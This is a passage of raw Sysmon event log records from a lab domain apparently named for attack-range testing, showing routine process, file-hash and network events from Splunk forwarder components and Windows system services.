Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6514D05284E0D4BE5C77842EA2FCAA8A,SHA256=244C2F8DD9FF8F9C89B74D3CC2F2DE6933C3A31D534441D6570B7ABE5C87EBEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292666Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:47.050{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BDFA0CC9FC8402431C3D821F181E653,SHA256=A41D5B8F3F36473496761533B07969222D4BD8132BAB507628C7FA7E14D9441A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000292665Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:44.828{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50633-false20.188.78.187-443https 23542300x8000000000000000441278Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:47.866{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=423C1EB6E0F83BEF73F920ADD694D184,SHA256=E0E6DE9AC7FA85965749235B92E247F245ACB45BA652C636108CC5C9BBFC0010,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441277Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:47.662{42DC5269-028F-6088-CD28-00000000BA01}41885196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441276Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:47.527{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-028F-6088-CD28-00000000BA01}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441275Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:47.526{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441274Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:47.526{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441273Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:47.525{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441272Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:47.525{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441271Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:47.525{42DC5269-CE96-6086-0500-00000000BA01}412368C:\Windows\system32\csrss.exe{42DC5269-028F-6088-CD28-00000000BA01}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441270Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:47.525{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-028F-6088-CD28-00000000BA01}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000441269Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:47.525{42DC5269-028F-6088-CD28-00000000BA01}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000441268Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.268{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal62523- 10341000x8000000000000000441267Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:47.214{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441266Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:47.214{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441300Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.994{42DC5269-0290-6088-CF28-00000000BA01}64602260C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441299Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.923{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E01B04B65BEBC87DDAB652060BB978EE,SHA256=B4B630251BD015C17991F4709D98CC76C8C2D22A47A39061A83FAC6730D236FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292668Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:48.154{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DAB84DF70E5C8A4F4AE7466B50E31152,SHA256=3E368D82B076E3464C4B983A5D1CDC38038E5BEC16E5327382DA68DED98324D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292667Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:48.071{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3AB62839F798F4D48665B9ACC11E89D,SHA256=AA9217F0DBF352A5E80A62B5C9CF9519E6A5BBF9BA0A32DE8651AF75B592D3BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441298Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.858{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0290-6088-CF28-00000000BA01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441297Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.858{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441296Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.858{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441295Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.857{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441294Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.857{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441293Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.857{42DC5269-CE96-6086-0500-00000000BA01}412368C:\Windows\system32\csrss.exe{42DC5269-0290-6088-CF28-00000000BA01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441292Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.857{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0290-6088-CF28-00000000BA01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000441291Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.856{42DC5269-0290-6088-CF28-00000000BA01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000441290Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.321{42DC5269-0290-6088-CE28-00000000BA01}57765844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441289Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.215{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441288Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.215{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441287Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.193{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0290-6088-CE28-00000000BA01}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441286Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.192{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441285Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 